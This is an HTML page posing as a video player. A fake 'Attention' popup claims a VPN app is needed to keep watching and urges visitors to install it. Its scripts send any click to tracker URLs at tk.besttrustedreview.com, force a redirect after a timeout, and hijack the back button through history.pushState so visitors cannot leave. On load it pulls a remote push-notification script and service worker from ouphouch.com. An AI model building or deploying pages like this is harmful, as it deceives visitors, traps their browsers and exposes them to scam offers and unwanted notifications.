<!DOCTYPE html><html lang="en"><head>
  <base href="">

<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Attention</title>
<link href="css.css" rel="stylesheet">
<script src="jquery-3.4.1.min.js" type="text/javascript"></script>
<style>
      * {
        margin: 0;
        padding: 0;
        -webkit-box-sizing: border-box;
                box-sizing: border-box;
      }
      html {
        font-size: 16px;
      }
      html,
      body {
        width: 100%;
        height: 100%;
      }
      body {
        font-family: 'Open Sans', sans-serif;
        position: relative;
        background: #1E222B;
      }
      a {
        text-decoration: none;
		position: relative;
      }
      .wrapper {
        width: 100%;
        height: 100%;
        color: #3e3e3e;
        display: -webkit-box;
        display: -webkit-flex;
        display: -ms-flexbox;
        display: flex;
        -webkit-box-align: center;
        -webkit-align-items: center;
            -ms-flex-align: center;
                align-items: center;
        -webkit-box-pack: center;
        -webkit-justify-content: center;
            -ms-flex-pack: center;
                justify-content: center;
      }
      .wrapper__player {
        background: #000;
        padding: 5px;
        position: relative;
      }
      .offerText {
        font-size: 1.2rem;
        line-height: 1.2;
        font-weight: 400;
      }
      .offerText p {
        margin-bottom: 5px;
      }
      .offerText p:last-child {
        margin-bottom: 0;
      }
      .offerText b {
        font-weight: 700;
      }
  
.bg {
  top: 0;
  left: 0;
  width: 100%;
  height: 100%;
  position: absolute;
  background: url(bg_GIF.gif);
  background-size: cover;
  background-position: center;
  opacity: 0.2;
  -webkit-animation: show 1s linear forwards;
          animation: show 1s linear forwards;
}
.bg_mask {
  top: 0;
  left: 0;
  width: 100%;
  height: 100%;
  position: absolute;
  background: rgba(0, 0, 0, 0.8);
  opacity: 0.4;
  -webkit-animation: show 1s steps(1, end) forwards;
          animation: show 1s steps(1, end) forwards;
}
@-webkit-keyframes show {
  100% {
    opacity: 1;
  }
}
@keyframes show {
  100% {
    opacity: 1;
  }
}
	  
.logo {
  position: absolute;
  top: 15px;
  left: 20px;
}
.logo img {
   width: 110px;
   opacity: 0.4;
}
	  
      .loaderPic {
        width: 90px;
      }
      .loaderPic img {
        width: 100%;
        display: block;
      }
      .playerScreen {
	  	position: relative;
        height: 55vh;
        display: -webkit-box;
        display: -webkit-flex;
        display: -ms-flexbox;
        display: flex;
        -webkit-box-align: center;
        -webkit-align-items: center;
            -ms-flex-align: center;
                align-items: center;
        -webkit-box-pack: center;
        -webkit-justify-content: center;
            -ms-flex-pack: center;
                justify-content: center;
      }
.playerNavigation {
   position: relative;
}
      .progressLine {
        width: 100%;
        height: 2px;
        background: rgba(255, 255, 255, 0.3);
        margin-bottom: 3px;
      }
      .iconsWrapper {
        width: 100%;
        padding: 5px 0;
        display: -webkit-box;
        display: -webkit-flex;
        display: -ms-flexbox;
        display: flex;
        -webkit-box-align: center;
        -webkit-align-items: center;
            -ms-flex-align: center;
                align-items: center;
        -webkit-box-pack: justify;
        -webkit-justify-content: space-between;
            -ms-flex-pack: justify;
                justify-content: space-between;
      }
      .icon {
        fill: #fff;
        height: 22px;
      }
      .picIcon {
        height: 18px;
      }
      .leftSide,
      .rightSide {
        display: -webkit-box;
        display: -webkit-flex;
        display: -ms-flexbox;
        display: flex;
        -webkit-box-align: center;
        -webkit-align-items: center;
            -ms-flex-align: center;
                align-items: center;
      }
      .leftSide .icon {
        margin-right: 10px;
      }
      .rightSide .icon {
        margin-left: 10px;
      }
      .time {
        font-size: 0.8rem;
        line-height: 1;
        color: #fff;
        display: inline-block;
      }
      .modal {
        -webkit-border-radius: 10px;
                border-radius: 10px;
        color: #333333;
        text-align: center;
        background: #fff;
        width: 500px;
      }

.modal__top {
  padding: 17px;
  width: 100%;
  text-align: center;
}
.modal__top h1 {
  text-transform: capitalize;
  font-size: 1.4rem;
  font-weight: 700;
  margin-bottom: 5px;
}
.button {
  width: 100%;
  color: #2289fb;
  font-size: 1.3rem;
  font-weight: 400;
  border-top: solid 1px rgba(0, 0, 0, 0.15);
  text-align: center;
  padding: 13px 10px;
  cursor: pointer;
}
.button:hover {
  background: rgba(225, 225, 225, 0.5);
}
.button:last-child:hover {
  border-radius: 0 0 10px 10px;
}
     
      /*************** media queries start ***********/
      @media only screen and (min-width: 1200px) {
        .wrapper__player {
          width: 1140px;
          margin: 30px auto 0;
        }
      }
      @media only screen and (max-width: 1200px) {
        .wrapper__player {
          width: 960px;
          margin: 30px auto 0;
        }
        .modal {
          width: 430px;
        }
      }
      @media only screen and (max-width: 992px) {
        .wrapper__player {
          width: 720px;
        }
      }
      @media only screen and (max-width: 768px) {
        .wrapper__player {
          width: 100%;
        }
        .playerScreen {
          height: 35vh;
        }
        .modal {
          width: 90%;
          margin: 0 auto;
        }
        .leftSide .icon {
          margin-right: 5px;
        }
        .rightSide .icon {
          margin-left: 5px;
        }
        .modal .offerText {
          font-size: 1rem;
        }
      }
	  @media screen and (max-width: 440px), screen and (max-width: 840px) and (max-height: 440px) and (orientation: landscape) {
	  .logo {
		top: 12px;
		left: 15px;
	  }
	  .logo img {
        width: 80px;
	  }
      .loaderPic {
        width: 45px;
      }
	  }
      @media only screen and (max-width: 320px) {
        html {
          font-size: 13px;
        }
        button {
          padding: 10px;
        }
        .wrapper__player {
          margin-top: 15px;
        }
        .loaderPic {
          width: 70px;
        }
        .icon {
          height: 20px;
        }
        .picIcon {
          height: 16px;
        }
      }
      @media screen and (max-width: 768px) and (orientation: landscape) {
        .wrapper {
          height: 100%;
          display: -webkit-box;
          display: -webkit-flex;
          display: -ms-flexbox;
          display: flex;
          -webkit-box-orient: vertical;
          -webkit-box-direction: normal;
          -webkit-flex-direction: column;
              -ms-flex-direction: column;
                  flex-direction: column;
        }
        .wrapper__player {
          width: 100%;
          height: 100%;
          display: -webkit-box;
          display: -webkit-flex;
          display: -ms-flexbox;
          display: flex;
          -webkit-box-pack: justify;
          -webkit-justify-content: space-between;
              -ms-flex-pack: justify;
                  justify-content: space-between;
          -webkit-box-orient: vertical;
          -webkit-box-direction: normal;
          -webkit-flex-direction: column;
              -ms-flex-direction: column;
                  flex-direction: column;
          margin-top: 0;
        }
        .playerScreen {
          height: 100%;
        }
      }
      @media screen and (max-width: 480px) and (orientation: landscape) {
        html {
          font-size: 14px;
        }
      }
      /*************** media queries end ***********/

    </style>
</head>
<body onclick="if (!window.__cfRLUnblockHandlers) return false; redirect()">
<div class="wrapper">
<div class="wrapper__player">
<div class="bg"></div>
<div class="bg_mask"></div>
<div class="playerScreen">
<div class="logo">
<img src="new_free.svg" alt="">
</div>
<div class="loaderPic" style="display: none;">
<img src="loading.svg" alt="">
</div>
<a onclick="redirect();" class="c_src">
<div class="modal" style="display: block;">
<div class="modal__top">
<h1>Attention</h1>
<p>VPN App Is required to continue watching in safe mode</p>
<p>1. Install the VPN App from Google Play.</p>
<p>2. Launch the App, Press "Protect Me" to Watch.</p>
</div>
<p class="button">Install</p>
<p class="button">Details</p>
</div>
</a>
</div>
<div class="playerNavigation">
<div class="progressLine"></div>
<div class="iconsWrapper">
<div class="leftSide">
<svg xmlns="http://www.w3.org/2000/svg" class="icon playIcon" viewBox="0 0 240 240">
<path d="M62.8,199.5c-1,0.8-2.4,0.6-3.3-0.4c-0.4-0.5-0.6-1.1-0.5-1.8V42.6c-0.2-1.3,0.7-2.4,1.9-2.6c0.7-0.1,1.3,0.1,1.9,0.4l154.7,77.7c2.1,1.1,2.1,2.8,0,3.8L62.8,199.5z"></path>
</svg>
<svg xmlns="http://www.w3.org/2000/svg" class="icon volumeIcon" viewBox="0 0 240 240"><path d="M116.5,42.8v154.4c0,2.8-1.7,3.6-3.8,1.7l-54.1-48H29c-2.8,0-5.2-2.3-5.2-5.2V94.3c0-2.8,2.3-5.2,5.2-5.2h29.6l54.1-48C114.8,39.2,116.5,39.9,116.5,42.8z"></path><path d="M136.2,160v-20c11.1,0,20-8.9,20-20s-8.9-20-20-20V80c22.1,0,40,17.9,40,40S158.3,160,136.2,160z"></path><path d="M216.2,120c0-44.2-35.8-80-80-80v20c33.1,0,60,26.9,60,60s-26.9,60-60,60v20C180.4,199.9,216.1,164.1,216.2,120z"></path></svg>
<div class="time">
00:00 / 1:37:43
</div>
</div>
<div class="rightSide">
<svg class="icon ccIcon" viewBox="0 0 240 240" focusable="false">
<path d="M215,40H25c-2.7,0-5,2.2-5,5v150c0,2.7,2.2,5,5,5h190c2.7,0,5-2.2,5-5V45C220,42.2,217.8,40,215,40z M108.1,137.7c0.7-0.7,1.5-1.5,2.4-2.3l6.6,7.8c-2.2,2.4-5,4.4-8,5.8c-8,3.5-17.3,2.4-24.3-2.9c-3.9-3.6-5.9-8.7-5.5-14v-25.6c0-2.7,0.5-5.3,1.5-7.8c0.9-2.2,2.4-4.3,4.2-5.9c5.7-4.5,13.2-6.2,20.3-4.6c3.3,0.5,6.3,2,8.7,4.3c1.3,1.3,2.5,2.6,3.5,4.2l-7.1,6.9c-2.4-3.7-6.5-5.9-10.9-5.9c-2.4-0.2-4.8,0.7-6.6,2.3c-1.7,1.7-2.5,4.1-2.4,6.5v25.6C90.4,141.7,102,143.5,108.1,137.7z M152.9,137.7c0.7-0.7,1.5-1.5,2.4-2.3l6.6,7.8c-2.2,2.4-5,4.4-8,5.8c-8,3.5-17.3,2.4-24.3-2.9c-3.9-3.6-5.9-8.7-5.5-14v-25.6c0-2.7,0.5-5.3,1.5-7.8c0.9-2.2,2.4-4.3,4.2-5.9c5.7-4.5,13.2-6.2,20.3-4.6c3.3,0.5,6.3,2,8.7,4.3c1.3,1.3,2.5,2.6,3.5,4.2l-7.1,6.9c-2.4-3.7-6.5-5.9-10.9-5.9c-2.4-0.2-4.8,0.7-6.6,2.3c-1.7,1.7-2.5,4.1-2.4,6.5v25.6C135.2,141.7,146.8,143.5,152.9,137.7z"></path>
</svg>
<svg viewBox="0 0 268.765 268.765" xml:space="preserve" class="icon settingsIcon">
<g id="Settings">
<g>
<path style="fill-rule:evenodd;clip-rule:evenodd;" d="M267.92,119.461c-0.425-3.778-4.83-6.617-8.639-6.617    c-12.315,0-23.243-7.231-27.826-18.414c-4.682-11.454-1.663-24.812,7.515-33.231c2.889-2.641,3.24-7.062,0.817-10.133    c-6.303-8.004-13.467-15.234-21.289-21.5c-3.063-2.458-7.557-2.116-10.213,0.825c-8.01,8.871-22.398,12.168-33.516,7.529    c-11.57-4.867-18.866-16.591-18.152-29.176c0.235-3.953-2.654-7.39-6.595-7.849c-10.038-1.161-20.164-1.197-30.232-0.08    c-3.896,0.43-6.785,3.786-6.654,7.689c0.438,12.461-6.946,23.98-18.401,28.672c-10.985,4.487-25.272,1.218-33.266-7.574    c-2.642-2.896-7.063-3.252-10.141-0.853c-8.054,6.319-15.379,13.555-21.74,21.493c-2.481,3.086-2.116,7.559,0.802,10.214    c9.353,8.47,12.373,21.944,7.514,33.53c-4.639,11.046-16.109,18.165-29.24,18.165c-4.261-0.137-7.296,2.723-7.762,6.597    c-1.182,10.096-1.196,20.383-0.058,30.561c0.422,3.794,4.961,6.608,8.812,6.608c11.702-0.299,22.937,6.946,27.65,18.415    c4.698,11.454,1.678,24.804-7.514,33.23c-2.875,2.641-3.24,7.055-0.817,10.126c6.244,7.953,13.409,15.19,21.259,21.508    c3.079,2.481,7.559,2.131,10.228-0.81c8.04-8.893,22.427-12.184,33.501-7.536c11.599,4.852,18.895,16.575,18.181,29.167    c-0.233,3.955,2.67,7.398,6.595,7.85c5.135,0.599,10.301,0.898,15.481,0.898c4.917,0,9.835-0.27,14.752-0.817    c3.897-0.43,6.784-3.786,6.653-7.696c-0.451-12.454,6.946-23.973,18.386-28.657c11.059-4.517,25.286-1.211,33.281,7.572    c2.657,2.89,7.047,3.239,10.142,0.848c8.039-6.304,15.349-13.534,21.74-21.494c2.48-3.079,2.13-7.559-0.803-10.213    c-9.353-8.47-12.388-21.946-7.529-33.524c4.568-10.899,15.612-18.217,27.491-18.217l1.662,0.043    c3.853,0.313,7.398-2.655,7.865-6.588C269.044,139.917,269.058,129.639,267.92,119.461z M134.595,179.491    c-24.718,0-44.824-20.106-44.824-44.824c0-24.717,20.106-44.824,44.824-44.824c24.717,0,44.823,20.107,44.823,44.824    C179.418,159.385,159.312,179.491,134.595,179.491z" fill="#FFFFFF"></path>
</g>
</g>
</svg>
<svg xmlns="http://www.w3.org/2000/svg" class="icon fullscreenIcon" viewBox="0 0 240 240"><path d="M96.3,186.1c1.9,1.9,1.3,4-1.4,4.4l-50.6,8.4c-1.8,0.5-3.7-0.6-4.2-2.4c-0.2-0.6-0.2-1.2,0-1.7l8.4-50.6c0.4-2.7,2.4-3.4,4.4-1.4l14.5,14.5l28.2-28.2l14.3,14.3l-28.2,28.2L96.3,186.1z M195.8,39.1l-50.6,8.4c-2.7,0.4-3.4,2.4-1.4,4.4l14.5,14.5l-28.2,28.2l14.3,14.3l28.2-28.2l14.5,14.5c1.9,1.9,4,1.3,4.4-1.4l8.4-50.6c0.5-1.8-0.6-3.6-2.4-4.2C197,39,196.4,39,195.8,39.1L195.8,39.1z"></path></svg>
</div>
</div>
</div>
</div>
</div>

<script type="text/javascript">
  document.getElementsByClassName('modal')[0].style.display = "none";

  setTimeout(function() {
    document.getElementsByClassName('loaderPic')[0].style.display = "none";
    document.getElementsByClassName('modal')[0].style.display = "block";
   }, 1000);
</script>

<script type="text/javascript">
  function redirect() {
     window.open('https://tk.besttrustedreview.com/click.php?lp=1&to_offer=1');
     setTimeout(function () {
       window.location.href = "https://tk.besttrustedreview.com/click.php?lp=1&to_offer=2";
     },  5000)
   }
  </script>
  
  <script type="text/javascript">
  setTimeout(function () {
    window.location.href = "https://tk.besttrustedreview.com/click.php?lp=1&to_offer=3&event10=1";
  }, 1800000);
  </script>
  
  <script type="text/javascript">
  ! function () {
      var t;
      try {
          const URL = window.location.href.split(/[#]/)[0];
          for (t = 0; 10 > t; ++t) history.pushState({}, "", URL+'#')
          onpopstate = function(event){
              event.state && location.replace('https://tk.besttrustedreview.com/click.php?lp=1&to_offer=3&event10=1');
          }
      } catch (o) { console.log( o ); }
  }();
  </script>
  
  <script>
  //org.rangextd.buzz
  var url = new URL(window.location.href);
  var pci = url.searchParams.get('clickid');
  var s = document.createElement('script');
  s.src='//ouphouch.com/pfe/current/micro.tag.min.js?z=4947068'+'&ymid='+pci+'&sw=/sw-check-permissions-747a6.js';
  s.onload = function(result) {
    switch (result) {
        case 'onPermissionDefault':break;
        case 'onPermissionAllowed':break;
        case 'onPermissionDenied':break;
        case 'onAlreadySubscribed':break;
        case 'onNotificationUnsupported':break;
    }
  }
  
  document.head.appendChild(s);
  </script>

</body></html>